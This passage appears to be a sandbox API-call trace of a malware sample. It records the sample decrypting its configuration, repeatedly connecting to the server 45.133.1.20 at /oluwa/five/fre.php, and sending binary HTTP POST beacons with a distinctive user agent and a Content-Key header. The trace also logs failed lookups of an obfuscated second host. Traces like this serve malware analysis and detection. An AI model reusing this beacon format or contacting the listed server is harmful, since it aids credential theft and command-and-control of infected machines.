() returned 0x6a0000 [0238.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.933] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0238.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.934] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0238.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0238.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.937] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0238.937] GetProcessHeap () returned 0x6a0000 [0238.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0238.960] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0238.960] GetProcessHeap () returned 0x6a0000 [0238.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0238.960] socket (af=2, type=1, protocol=6) returned 0x78c [0238.961] connect (s=0x78c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0238.990] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0238.990] GetProcessHeap () returned 0x6a0000 [0238.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0238.990] GetProcessHeap () returned 0x6a0000 [0238.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0238.991] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.992] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.992] GetProcessHeap () returned 0x6a0000 [0238.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4978 [0238.992] GetProcessHeap () returned 0x6a0000 [0238.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0238.992] GetProcessHeap () returned 0x6a0000 [0238.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0238.993] GetProcessHeap () returned 0x6a0000 [0238.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0238.993] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.994] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.995] GetProcessHeap () returned 0x6a0000 [0238.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0238.995] GetProcessHeap () returned 0x6a0000 [0238.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0238.995] send (s=0x78c, buf=0x6bd460*, len=242, flags=0) returned 242 [0238.996] send (s=0x78c, buf=0x6bb998*, len=159, flags=0) returned 159 [0238.996] GetProcessHeap () returned 0x6a0000 [0238.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0238.996] recv (in: s=0x78c, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0239.070] GetProcessHeap () returned 0x6a0000 [0239.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0239.071] GetProcessHeap () returned 0x6a0000 [0239.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0239.072] GetProcessHeap () returned 0x6a0000 [0239.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4978 | out: hHeap=0x6a0000) returned 1 [0239.072] GetProcessHeap () returned 0x6a0000 [0239.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0239.073] closesocket (s=0x78c) returned 0 [0239.073] GetProcessHeap () returned 0x6a0000 [0239.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0239.073] GetProcessHeap () returned 0x6a0000 [0239.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.074] GetProcessHeap () returned 0x6a0000 [0239.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0239.074] GetProcessHeap () returned 0x6a0000 [0239.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0239.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c0) returned 0x78c [0239.078] Sleep (dwMilliseconds=0xea60) [0239.079] GetProcessHeap () returned 0x6a0000 [0239.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0239.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.081] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.089] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0239.097] GetProcessHeap () returned 0x6a0000 [0239.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0239.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.098] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.099] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.100] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.100] GetProcessHeap () returned 0x6a0000 [0239.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0239.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.106] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0239.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.111] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.112] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0239.112] GetProcessHeap () returned 0x6a0000 [0239.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.113] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.115] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.116] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.117] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.117] GetProcessHeap () returned 0x6a0000 [0239.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0239.117] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.118] GetProcessHeap () returned 0x6a0000 [0239.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0239.118] GetProcessHeap () returned 0x6a0000 [0239.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.119] GetProcessHeap () returned 0x6a0000 [0239.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0239.119] GetProcessHeap () returned 0x6a0000 [0239.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0239.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.121] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0239.137] GetProcessHeap () returned 0x6a0000 [0239.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.139] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.140] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.142] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.142] GetProcessHeap () returned 0x6a0000 [0239.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.143] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0239.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.144] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.145] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0239.145] GetProcessHeap () returned 0x6a0000 [0239.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.146] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0239.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.147] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0239.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0239.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0239.150] GetProcessHeap () returned 0x6a0000 [0239.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0239.150] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0239.150] GetProcessHeap () returned 0x6a0000 [0239.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0239.150] socket (af=2, type=1, protocol=6) returned 0x790 [0239.150] connect (s=0x790, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0239.175] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0239.175] GetProcessHeap () returned 0x6a0000 [0239.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0239.175] GetProcessHeap () returned 0x6a0000 [0239.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0239.176] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.177] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.177] GetProcessHeap () returned 0x6a0000 [0239.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5038 [0239.177] GetProcessHeap () returned 0x6a0000 [0239.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.177] GetProcessHeap () returned 0x6a0000 [0239.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0239.177] GetProcessHeap () returned 0x6a0000 [0239.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0239.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0239.179] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.179] GetProcessHeap () returned 0x6a0000 [0239.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0239.179] GetProcessHeap () returned 0x6a0000 [0239.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0239.179] send (s=0x790, buf=0x6bd460*, len=242, flags=0) returned 242 [0239.180] send (s=0x790, buf=0x6bb998*, len=159, flags=0) returned 159 [0239.180] GetProcessHeap () returned 0x6a0000 [0239.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0239.180] recv (in: s=0x790, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0239.251] GetProcessHeap () returned 0x6a0000 [0239.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0239.252] GetProcessHeap () returned 0x6a0000 [0239.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0239.253] GetProcessHeap () returned 0x6a0000 [0239.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5038 | out: hHeap=0x6a0000) returned 1 [0239.254] GetProcessHeap () returned 0x6a0000 [0239.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0239.254] closesocket (s=0x790) returned 0 [0239.254] GetProcessHeap () returned 0x6a0000 [0239.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0239.254] GetProcessHeap () returned 0x6a0000 [0239.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.255] GetProcessHeap () returned 0x6a0000 [0239.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0239.255] GetProcessHeap () returned 0x6a0000 [0239.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0239.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c4) returned 0x790 [0239.257] Sleep (dwMilliseconds=0xea60) [0239.259] GetProcessHeap () returned 0x6a0000 [0239.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0239.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0239.274] GetProcessHeap () returned 0x6a0000 [0239.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dbba8 [0239.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.276] CryptImportKey (in: hProv=0x6bef48, pbData=0x6dbba8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.277] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.278] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.278] GetProcessHeap () returned 0x6a0000 [0239.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbba8 | out: hHeap=0x6a0000) returned 1 [0239.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.279] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0239.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.280] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.281] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0239.281] GetProcessHeap () returned 0x6a0000 [0239.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.282] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.283] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.284] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.285] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.285] GetProcessHeap () returned 0x6a0000 [0239.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0239.285] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0239.285] GetProcessHeap () returned 0x6a0000 [0239.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0239.286] GetProcessHeap () returned 0x6a0000 [0239.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0239.286] GetProcessHeap () returned 0x6a0000 [0239.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0239.286] GetProcessHeap () returned 0x6a0000 [0239.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0239.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0239.309] GetProcessHeap () returned 0x6a0000 [0239.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0239.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.310] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0239.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.311] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.312] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.312] GetProcessHeap () returned 0x6a0000 [0239.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0239.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.314] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0239.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.315] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0239.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0239.317] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0239.317] GetProcessHeap () returned 0x6a0000 [0239.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0239.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.318] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0239.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.319] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0239.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.320] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0239.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.322] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0239.322] GetProcessHeap () returned 0x6a0000 [0239.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 